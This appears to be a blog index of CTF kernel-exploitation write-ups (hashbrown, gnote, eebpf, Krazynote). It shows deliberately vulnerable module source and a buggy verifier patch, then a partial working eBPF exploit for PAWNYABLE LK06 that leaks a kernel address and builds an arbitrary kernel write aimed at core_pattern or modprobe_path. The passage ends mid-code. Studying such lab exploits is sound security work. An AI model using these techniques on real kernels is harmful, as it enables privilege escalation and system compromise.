Posts for: #2025

DiceCTF2021 hashbrown


Problem

Environment

  • linux version: 5.11.0-rc3
    • CONFIG_SLAB_FREELIST_RANDOM=y
    • CONFIG_SLAB=y
    • CONFIG_FG_KASLR=y
  • unprivileged_userfaultfd: 1
  • unprivileged_bpf_disabled: 0

Module

      #include <linux/device.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/mutex.h>
#include <linux/slab.h>
#include <linux/uaccess.h>

#define DEVICE_NAME "hashbrown"
#define CLASS_NAME "hashbrown"

MODULE_AUTHOR("FizzBuzz101");
MODULE_DESCRIPTION("Here's a hashbrown for everyone!");
MODULE_LICENSE("GPL");

#define ADD_KEY 0x1337
#define DELETE_KEY 0x1338
#define UPDATE_VALUE 0x1339
#define DELETE_VALUE 0x133a
#define GET_VALUE 0x133b

#define SIZE_ARR_START 0x10
#define SIZE_ARR_MAX 0x200
#define MAX_ENTRIES 0x400
#define MAX_VALUE_SIZE 0xb0
#define GET_THRESHOLD(size) size - (size >> 2)

#define INVALID 1
#define EXISTS 2
#define NOT_EXISTS 3
#define MAXED 4

static DEFINE_MUTEX(operations_lock);
static DEFINE_MUTEX(resize_lock);
static long hashmap_ioctl(struct file *file, unsigned int cmd,
                          unsigned long arg);

static int major;
static struct class *hashbrown_class = NULL;
static struct device *hashbrown_device = NULL;
static struct file_operations hashbrown_fops = {.unlocked_ioctl =
                                                    hashmap_ioctl};

/* Layout of the userspace ioctl argument, shared by all commands. */
typedef struct {
  uint32_t key;
  uint32_t size;
  char *src;   /* user buffer a value is copied from (ADD_KEY/UPDATE_VALUE) */
  char *dest;  /* user buffer a value is copied to (GET_VALUE) */
} request_t;

/* Singly linked bucket node: key, value length, kmalloc'd value buffer. */
struct hash_entry {
  uint32_t key;
  uint32_t size;
  char *value;
  struct hash_entry *next;
};
typedef struct hash_entry hash_entry;

/* The global map: a power-of-two bucket array plus the bookkeeping used
 * to decide when to grow (see GET_THRESHOLD). */
typedef struct {
  uint32_t size;
  uint32_t threshold;
  uint32_t entry_count;
  hash_entry **buckets;
} hashmap_t;
hashmap_t hashmap;

static noinline uint32_t get_hash_idx(uint32_t key, uint32_t size);

static noinline long resize(request_t *arg);
static noinline void resize_add(uint32_t idx, hash_entry *entry,
                                hash_entry **new_buckets);
static noinline void resize_clean_old(void);

static noinline long add_key(uint32_t idx, uint32_t key, uint32_t size,
                             char *src);
static noinline long delete_key(uint32_t idx, uint32_t key);
static noinline long update_value(uint32_t idx, uint32_t key, uint32_t size,
                                  char *src);
static noinline long delete_value(uint32_t idx, uint32_t key);
static noinline long get_value(uint32_t idx, uint32_t key, uint32_t size,
                               char *dest);

#pragma GCC push_options
#pragma GCC optimize("O1")

/*
 * ioctl entry point: copies a request_t from userspace and dispatches
 * to the ADD_KEY / DELETE_KEY / UPDATE_VALUE / DELETE_VALUE / GET_VALUE
 * handlers under operations_lock.
 *
 * NOTE(review): when ADD_KEY hits the growth threshold, resize() runs
 * under resize_lock ONLY -- operations_lock is not taken on that path,
 * so resize() can race against every other handler.  This looks like
 * the intended bug of the challenge; confirm.
 */
static long hashmap_ioctl(struct file *file, unsigned int cmd,
                          unsigned long arg) {
  long result;
  request_t request;
  uint32_t idx;

  if (cmd == ADD_KEY) {
    if (hashmap.entry_count == hashmap.threshold &&
        hashmap.size < SIZE_ARR_MAX) {
      /* Grow the table (and insert the new key) instead of inserting
       * directly. */
      mutex_lock(&resize_lock);
      result = resize((request_t *)arg);
      mutex_unlock(&resize_lock);
      return result;
    }
  }

  mutex_lock(&operations_lock);
  if (copy_from_user((void *)&request, (void *)arg, sizeof(request_t))) {
    result = INVALID;
  } else if (cmd == ADD_KEY && hashmap.entry_count == MAX_ENTRIES) {
    result = MAXED;
  } else {
    idx = get_hash_idx(request.key, hashmap.size);
    switch (cmd) {
      case ADD_KEY:
        result = add_key(idx, request.key, request.size, request.src);
        break;
      case DELETE_KEY:
        result = delete_key(idx, request.key);
        break;
      case UPDATE_VALUE:
        result = update_value(idx, request.key, request.size, request.src);
        break;
      case DELETE_VALUE:
        result = delete_value(idx, request.key);
        break;
      case GET_VALUE:
        result = get_value(idx, request.key, request.size, request.dest);
        break;
      default:
        result = INVALID;
        break;
    }
  }
  mutex_unlock(&operations_lock);
  return result;
}

/* Mix the key bits and reduce them to a bucket index.
 * `size` must be a power of two, since the reduction is a mask. */
static uint32_t get_hash_idx(uint32_t key, uint32_t size) {
  uint32_t mixed, bucket;

  mixed = key ^ (key >> 20) ^ (key >> 12);
  bucket = mixed ^ (mixed >> 7) ^ (mixed >> 4);
  return bucket & (size - 1);
}

/* Push @entry onto the head of bucket @idx in @new_buckets.  When the
 * bucket is empty, entry->next is left untouched (callers hand in
 * zero-initialized or explicitly terminated entries), exactly like the
 * original two-branch version. */
static noinline void resize_add(uint32_t idx, hash_entry *entry,
                                hash_entry **new_buckets) {
  hash_entry *head = new_buckets[idx];

  if (head != NULL) {
    entry->next = head;
  }
  new_buckets[idx] = entry;
}

/*
 * Free every hash_entry in the current bucket array, then the bucket
 * array itself, and clear hashmap.buckets.  The entries' ->value
 * buffers are deliberately NOT freed: resize() has already copied the
 * value pointers into the freshly cloned entries.
 */
static noinline void resize_clean_old() {
  int i;
  hash_entry *traverse, *temp;
  for (i = 0; i < hashmap.size; i++) {
    if (hashmap.buckets[i]) {
      traverse = hashmap.buckets[i];
      while (traverse) {
        temp = traverse;
        traverse = traverse->next;
        kfree(temp);
      }
      hashmap.buckets[i] = NULL;
    }
  }
  kfree(hashmap.buckets);
  hashmap.buckets = NULL;
  return;
}

/*
 * Double the bucket array, rehash every existing entry into it, and
 * insert the requested key/value unless the key already exists.
 * Returns 0 on success, EXISTS for a duplicate key, INVALID on error.
 *
 * Called from hashmap_ioctl() under resize_lock only.
 * NOTE(review): operations_lock is NOT held here, so the other
 * handlers can mutate the map concurrently; combined with the
 * faultable copy_from_user() below (unprivileged userfaultfd is
 * enabled), this is a large race window -- confirm it is intended.
 */
static long resize(request_t *arg) {
  hash_entry **new_buckets, *temp_entry, *temp;
  request_t request;
  char *temp_data;
  uint32_t new_size, new_threshold, new_idx;
  int i, duplicate;

  if (copy_from_user((void *)&request, (void *)arg, sizeof(request_t))) {
    return INVALID;
  }
  if (request.size < 1 || request.size > MAX_VALUE_SIZE) {
    return INVALID;
  }

  new_size = hashmap.size * 2;
  new_threshold = GET_THRESHOLD(new_size);
  new_buckets = kzalloc(sizeof(hash_entry *) * new_size, GFP_KERNEL);

  if (!new_buckets) {
    return INVALID;
  }

  /* Clone every entry into the new bucket array.  Only the value
   * POINTER is copied; the old entry structs are freed later by
   * resize_clean_old(). */
  duplicate = 0;
  for (i = 0; i < hashmap.size; i++) {
    if (hashmap.buckets[i]) {
      for (temp_entry = hashmap.buckets[i]; temp_entry != NULL;
           temp_entry = temp_entry->next) {
        if (temp_entry->key == request.key) {
          duplicate = 1;
        }
        new_idx = get_hash_idx(temp_entry->key, new_size);
        temp = kzalloc(sizeof(hash_entry), GFP_KERNEL);
        if (!temp) {
          /* NOTE(review): only the bucket array is freed here; the
           * entry structs already cloned into it are leaked. */
          kfree(new_buckets);
          return INVALID;
        }
        temp->key = temp_entry->key;
        temp->size = temp_entry->size;
        temp->value = temp_entry->value;
        resize_add(new_idx, temp, new_buckets);
      }
    }
  }
  if (!duplicate) {
    new_idx = get_hash_idx(request.key, new_size);
    temp = kzalloc(sizeof(hash_entry), GFP_KERNEL);
    if (!temp) {
      kfree(new_buckets);
      return INVALID;
    }
    temp_data = kzalloc(request.size, GFP_KERNEL);
    if (!temp_data) {
      kfree(temp);
      kfree(new_buckets);
      return INVALID;
    }
    /* Faultable user copy: a userfaultfd-backed request.src can stall
     * the resize here while only resize_lock is held. */
    if (copy_from_user(temp_data, request.src, request.size)) {
      kfree(temp_data);
      kfree(temp);
      kfree(new_buckets);
      return INVALID;
    }
    temp->size = request.size;
    temp->value = temp_data;
    temp->key = request.key;
    temp->next = NULL;
    resize_add(new_idx, temp, new_buckets);
    hashmap.entry_count++;
  }
  /* Free the old entry structs/bucket array, then publish the new
   * table. */
  resize_clean_old();
  hashmap.size = new_size;
  hashmap.threshold = new_threshold;
  hashmap.buckets = new_buckets;
  return (duplicate) ? EXISTS : 0;
}

/*
 * Insert a new entry (@key -> @size bytes copied from user @src) into
 * bucket @idx.  Returns 0 on success, EXISTS if the key is already in
 * the bucket, INVALID on bad size / allocation / copy failure.
 *
 * NOTE(review): when copy_from_user() fails, or when only one of the
 * two kzalloc() calls fails, the successful allocation(s) are leaked.
 */
static long add_key(uint32_t idx, uint32_t key, uint32_t size, char *src) {
  hash_entry *temp_entry, *temp;
  char *temp_data;
  if (size < 1 || size > MAX_VALUE_SIZE) {
    return INVALID;
  }

  temp_entry = kzalloc(sizeof(hash_entry), GFP_KERNEL);
  temp_data = kzalloc(size, GFP_KERNEL);
  if (!temp_entry || !temp_data) {
    return INVALID;
  }
  if (copy_from_user(temp_data, src, size)) {
    return INVALID;
  }
  temp_entry->key = key;
  temp_entry->size = size;
  temp_entry->value = temp_data;
  temp_entry->next = NULL;

  if (!hashmap.buckets[idx]) {
    /* Empty bucket: the new entry becomes the head. */
    hashmap.buckets[idx] = temp_entry;
    hashmap.entry_count++;
    return 0;
  } else {
    /* Walk to the tail, rejecting duplicates along the way (the tail
     * node itself is checked after the loop). */
    for (temp = hashmap.buckets[idx]; temp->next != NULL; temp = temp->next) {
      if (temp->key == key) {
        kfree(temp_data);
        kfree(temp_entry);
        return EXISTS;
      }
    }
    if (temp->key == key) {
      kfree(temp_data);
      kfree(temp_entry);
      return EXISTS;
    }
    temp->next = temp_entry;
    hashmap.entry_count++;
    return 0;
  }
}

/*
 * Unlink and free the entry for @key in bucket @idx, including its
 * value buffer.  Returns 0 on success, NOT_EXISTS if no such key.
 */
static long delete_key(uint32_t idx, uint32_t key) {
  hash_entry *temp, *prev;

  if (!hashmap.buckets[idx]) {
    return NOT_EXISTS;
  }
  /* Head of the list needs special-casing (no predecessor). */
  if (hashmap.buckets[idx]->key == key) {
    temp = hashmap.buckets[idx]->next;
    if (hashmap.buckets[idx]->value) {
      kfree(hashmap.buckets[idx]->value);
    }
    kfree(hashmap.buckets[idx]);
    hashmap.buckets[idx] = temp;
    hashmap.entry_count--;
    return 0;
  }
  /* Interior/tail node: find it while tracking the predecessor. */
  temp = hashmap.buckets[idx];
  while (temp != NULL && temp->key != key) {
    prev = temp;
    temp = temp->next;
  }
  if (temp == NULL) {
    return NOT_EXISTS;
  }
  prev->next = temp->next;
  if (temp->value) {
    kfree(temp->value);
  }
  kfree(temp);
  hashmap.entry_count--;
  return 0;
}

/*
 * Replace the value stored for @key in bucket @idx with @size bytes
 * from user @src.  If the new size differs from the stored one, the
 * old buffer is freed and a new one allocated; otherwise the existing
 * buffer is overwritten in place.  Returns 0, NOT_EXISTS, or INVALID.
 *
 * NOTE(review): if copy_from_user() fails after kzalloc() succeeded,
 * temp_data is leaked and the entry is left with size 0 / no value.
 */
static long update_value(uint32_t idx, uint32_t key, uint32_t size, char *src) {
  hash_entry *temp;
  char *temp_data;

  if (size < 1 || size > MAX_VALUE_SIZE) {
    return INVALID;
  }
  if (!hashmap.buckets[idx]) {
    return NOT_EXISTS;
  }

  for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp->next) {
    if (temp->key == key) {
      if (temp->size != size) {
        /* Size changed: free the old buffer before allocating anew. */
        if (temp->value) {
          kfree(temp->value);
        }
        temp->value = NULL;
        temp->size = 0;
        temp_data = kzalloc(size, GFP_KERNEL);
        if (!temp_data || copy_from_user(temp_data, src, size)) {
          return INVALID;
        }
        temp->size = size;
        temp->value = temp_data;
      } else {
        /* Same size: reuse the existing buffer. */
        if (copy_from_user(temp->value, src, size)) {
          return INVALID;
        }
      }
      return 0;
    }
  }
  return NOT_EXISTS;
}

/*
 * Free the value buffer (but keep the entry) for @key in bucket @idx.
 * Returns 0 on success, NOT_EXISTS if the key is absent or the entry
 * already has no value.
 */
static long delete_value(uint32_t idx, uint32_t key) {
  hash_entry *node;

  if (hashmap.buckets[idx] == NULL) {
    return NOT_EXISTS;
  }
  for (node = hashmap.buckets[idx]; node != NULL; node = node->next) {
    if (node->key != key) {
      continue;
    }
    if (node->value == NULL || node->size == 0) {
      return NOT_EXISTS;
    }
    kfree(node->value);
    node->value = NULL;
    node->size = 0;
    return 0;
  }
  return NOT_EXISTS;
}

/*
 * Copy @size bytes of the value stored for @key in bucket @idx to the
 * user buffer @dest.  @size must not exceed the recorded value size.
 * Returns 0, NOT_EXISTS, or INVALID.
 */
static long get_value(uint32_t idx, uint32_t key, uint32_t size, char *dest) {
  hash_entry *temp;
  if (!hashmap.buckets[idx]) {
    return NOT_EXISTS;
  }
  for (temp = hashmap.buckets[idx]; temp != NULL; temp = temp->next) {
    if (temp->key == key) {
      if (!temp->value || !temp->size) {
        return NOT_EXISTS;
      }
      /* The read is bounded by the size recorded on the entry. */
      if (size > temp->size) {
        return INVALID;
      }
      if (copy_to_user(dest, temp->value, size)) {
        return INVALID;
      }
      return 0;
    }
  }
  return NOT_EXISTS;
}

#pragma GCC pop_options

/*
 * Module init: register the character device, create the class/device
 * node, and set up the initial 0x10-bucket hashmap.
 */
static int __init init_hashbrown(void) {
  major = register_chrdev(0, DEVICE_NAME, &hashbrown_fops);
  if (major < 0) {
    return -1;
  }
  hashbrown_class = class_create(THIS_MODULE, CLASS_NAME);
  if (IS_ERR(hashbrown_class)) {
    unregister_chrdev(major, DEVICE_NAME);
    return -1;
  }
  hashbrown_device =
      device_create(hashbrown_class, 0, MKDEV(major, 0), 0, DEVICE_NAME);
  if (IS_ERR(hashbrown_device)) {
    class_destroy(hashbrown_class);
    unregister_chrdev(major, DEVICE_NAME);
    return -1;
  }
  mutex_init(&operations_lock);
  mutex_init(&resize_lock);

  hashmap.size = SIZE_ARR_START;
  hashmap.entry_count = 0;
  hashmap.threshold = GET_THRESHOLD(hashmap.size);
  /* NOTE(review): this allocation is unchecked; if it fails, the first
   * ioctl dereferences a NULL bucket array. */
  hashmap.buckets = kzalloc(sizeof(hash_entry *) * hashmap.size, GFP_KERNEL);
  printk(KERN_INFO "HashBrown Loaded! Who doesn't love Hashbrowns!\n");
  return 0;
}

/*
 * Module exit: tear down the device node, class, and chrdev.
 * NOTE(review): the hashmap buckets/entries/values are never freed
 * here, so unloading leaks whatever is still stored.
 */
static void __exit exit_hashbrown(void) {
  device_destroy(hashbrown_class, MKDEV(major, 0));
  class_unregister(hashbrown_class);
  class_destroy(hashbrown_class);
  unregister_chrdev(major, DEVICE_NAME);
  mutex_destroy(&operations_lock);
  mutex_destroy(&resize_lock);
  printk(KERN_INFO "HashBrown Unloaded\n");
}

module_init(init_hashbrown);
module_exit(exit_hashbrown);

This module allows us to add, delete and update keys and values in a hashmap.

Read more →

TokyoWesternsCTF2019 gnote


Problem

Environment

  • linux version: 4.19.65
  • mmap_min_addr: 0x1000
  • No SMAP

Module

/* Userspace request for gnote_write(): a command selector and one
 * 32-bit argument (length for add, note index for select). */
typedef struct request_t {
  uint32_t cmd;
  uint32_t arg;
} request_t;

/*
 * (Decompiled listing.)  write() handler for the gnote device:
 * dispatches on a command read directly from the *user* request
 * pointer @req.
 *
 * NOTE(review): req points into userspace and req->cmd is dereferenced
 * without copy_from_user(); if the switch compiles into a jump table
 * whose index is re-fetched from user memory, a racing thread can swap
 * cmd between fetches (double fetch, no SMAP).  This looks like the
 * intended bug -- confirm against the module binary.
 */
int64_t gnote_write(struct file *a1, const request_t *req, size_t a3,
                    loff_t *a4) {
  uint64_t len;
  note_data_t *req;  /* decompiler artifact: shadows the parameter `req` */
  void *new_note_data;

  mutex_lock(&lock);
  switch (req->cmd) {
    case 1:
      /* Add a note; only 8 slots exist. */
      if ((uint64_t)cnt <= 7) {
        len = (uint32_t)req->arg;
        cur_note = &notes[cnt];
        /* len is recorded BEFORE it is validated; an oversized request
         * leaves the slot with a large len and no fresh allocation
         * (cnt is not advanced, so the slot is reused next time). */
        cur_note->len = len;
        if (len <= 0x10000) {
          new_note_data = kmalloc(len, 0x6000C0LL);
          ++cnt;
          cur_note->data = new_note_data;
        }
      }
      break;
    case 2:
      printk("Edit Not implemented\n");
      break;
    case 3:
      printk("Delete Not implemented\n");
      break;
    case 4:
      printk("Copy Not implemented\n");
      break;
    case 5:
      /* Select a note for the next read(). */
      if ((uint32_t)req->arg < (uint64_t)cnt) selected = (uint32_t)req->arg;
      break;
    default:
      break;
  }
  mutex_unlock(&lock);
  return a3;
}

/*
 * (Decompiled listing.)  read() handler: copies the currently selected
 * note's data to userspace, capped at min(len, note->len), then clears
 * the selection.
 */
uint64_t gnote_read(struct file *a1, char *a2, size_t len, loff_t *a4) {
  note_data_t *cur_note;

  mutex_lock(&lock);
  if (selected == -1) {
    /* Nothing selected: read returns nothing. */
    mutex_unlock(&lock);
    return 0LL;
  } else {
    cur_note = &notes[selected];
    /* Clamp the copy to the note's recorded length. */
    if (cur_note->len <= len) len = cur_note->len;
    copy_to_user(a2, cur_note->data, len);
    selected = -1LL;  /* one-shot: selection is consumed */
    mutex_unlock(&lock);
    return len;
  }
}

The gnote module has just 3 features: add a new note, select a note and get a note’s content. With these features alone, we cannot write content to a note (Edit is not implemented…).

Read more →

TokyoWesternsCTF2020 eebpf


Problem

Environment

  • kernel version: 5.4.58
  • unprivileged_bpf_disabled: 0

Patch file

The important part is following:

      diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/include/uapi/linux/bpf.h buildroot-2020.08-rc3_original/output/build/linux-5.4.58/include/uapi/linux/bpf.h
27d26
< #define BPF_ALSH	0xe0	/* sign extending arithmetic shift left */
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/tnum.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/tnum.c
42,52d41
< struct tnum tnum_alshift(struct tnum a, u8 min_shift, u8 insn_bitness)
< {
< 	if (insn_bitness == 32)
< 		//Never reach here now.
< 		return TNUM((u32)(((s32)a.value) << min_shift),
< 			    (u32)(((s32)a.mask)  << min_shift));
< 	else
< 		return TNUM((s64)a.value << min_shift,
< 			    (s64)a.mask  << min_shift);
< }
< 
diff -r ./buildroot-2020.08-rc3/output/build/linux-5.4.58/kernel/bpf/verifier.c buildroot-2020.08-rc3_original/output/build/linux-5.4.58/kernel/bpf/verifier.c
4867,4897d4866
< 	case BPF_ALSH:
< 		if (umax_val >= insn_bitness) {
< 			/* Shifts greater than 31 or 63 are undefined.
< 			 * This includes shifts by a negative number.
< 			 */
< 			mark_reg_unknown(env, regs, insn->dst_reg);
< 			break;
< 		}
< 
< 		/* Upon reaching here, src_known is true and
< 		 * umax_val is equal to umin_val.
< 		 */
< 		if (insn_bitness == 32) {
< 			//Now we don't support 32bit. Cuz im too lazy.
< 			mark_reg_unknown(env, regs, insn->dst_reg);
< 			break;
< 		} else {
< 			dst_reg->smin_value <<= umin_val;
< 			dst_reg->smax_value <<= umin_val;
< 		}
< 
< 		dst_reg->var_off = tnum_alshift(dst_reg->var_off, umin_val,
< 						insn_bitness);
< 
< 		/* blow away the dst_reg umin_value/umax_value and rely on
< 		 * dst_reg var_off to refine the result.
< 		 */
< 		dst_reg->umin_value = 0;
< 		dst_reg->umax_value = U64_MAX;
< 		__update_reg_bounds(dst_reg);
< 		break;

And related location is following:

Read more →

BalsnCTF2019 Krazynote


Problem

Environment

  • kernel version: 5.1.9

Features

This challenge provides a note misc device with which we can save (0xffffff00), get (0xffffff02) and update (0xffffff01) data using unlocked_ioctl. Whenever we save or update data, it is stored xor-encrypted.

And the struct enc_data (stored data) and struct request_t is following:

/* ioctl request: note index, payload size, and a userspace pointer
 * (passed as an integer). */
typedef struct request_t {
  uint64_t idx;
  uint64_t size;
  uint64_t data;
} request_t;

/* Stored note: per-note xor key, payload size, the original user
 * address encoded relative to page_offset_base, then the encrypted
 * bytes inline. */
typedef struct enc_data_t {
  uint64_t xor_key;
  uint64_t size;
  uint64_t data_addr_minus_page_offset_base;
  char enc_data[0]; // Struct Hack; see https://www.geeksforgeeks.org/struct-hack/
} enc_data_t;

Vulnerability

Since unlocked_ioctl performs no implicit locking and the device itself does not use a mutex, we can easily mount a race-condition attack. Furthermore, in the given kernel environment, unprivileged userfaultfd is allowed.

Read more →

PAWNYABLE LK06: Brahman


LK06: Brahman

Exploit using adjust_ptr_min_max_vals

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handler the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

/* Pause helper for debugging: show @msg, then block until the user
 * presses enter. */
void get_enter_to_continue(const char* msg) {
  puts(msg);
  (void)getchar();
}

/* Report @msg via perror() and terminate the exploit with status -1. */
void fatal(const char* msg) {
  perror(msg);
  exit(-1);
}

/* Minimal wrapper around the bpf(2) syscall. */
int bpf(int cmd, union bpf_attr* attrs) {
  long rc = syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
  return (int)rc;
}

/* Create a BPF_MAP_TYPE_ARRAY map with int keys and @val_size-byte
 * values; aborts the exploit on failure. */
int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.map_type = BPF_MAP_TYPE_ARRAY;
  attr.key_size = sizeof(int);
  attr.value_size = val_size;
  attr.max_entries = max_entries;

  int fd = bpf(BPF_MAP_CREATE, &attr);
  if (fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }
  return fd;
}
/* Write *pval into map slot @key; aborts the exploit on failure. */
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.map_fd = map_fd;
  attr.key = (uint64_t)&key;
  attr.value = (uint64_t)pval;
  attr.flags = BPF_ANY;

  int rc = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (rc < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }
  return rc;
}
/* Read map slot @key into *pval; returns the raw bpf() result.
 * (.flags is ignored by lookup but kept for symmetry with update.) */
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.map_fd = map_fd;
  attr.key = (uint64_t)&key;
  attr.value = (uint64_t)pval;
  attr.flags = BPF_ANY;

  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

int mapfd = -1;
/*
 * Leak the kernel address of the `struct bpf_map` behind `mapfd`.
 *
 * The loaded program exploits the patched-out __mark_reg32_known()
 * call in the verifier: it builds a scalar whose tracked bounds
 * disagree with its runtime value (runtime 1), adds it to the
 * map-value pointer, and stores the resulting pointer back into the
 * map element.  Userspace then reads the element: value - 1 (the
 * runtime offset) - 0x110 (the element's offset inside the map
 * object, per the author's build) is presumably &bpf_map.
 */
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  /* Attach the filter to one end of a socketpair and send a packet
   * through it so the program actually runs. */
  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  write(socks[1], "Hello", 5);

  bpf_map_lookup(mapfd, 0, &val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  /* val == elem_ptr + 1 (the smuggled runtime offset); the element
   * data sits 0x110 into the map object -- offsets per this build. */
  return val - 1 - 0x110;
}

/*
 * Arbitrary 64-bit kernel write: *(uint64_t *)addr = val.
 *
 * Uses the same verifier-bounds confusion as leak_bpf_map_addr() so
 * the verifier believes the skb_load_bytes() length is 1 while it is
 * 0x10 at runtime: the first call overflows the fp-0x20 stack slot
 * and replaces the saved destination pointer at fp-0x18 with @addr
 * taken from the packet; the second call then copies @val to that
 * address.  The packet written to the socket is {marker, addr, val}.
 * Returns the unchanged marker word (callers ignore it).
 */
uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
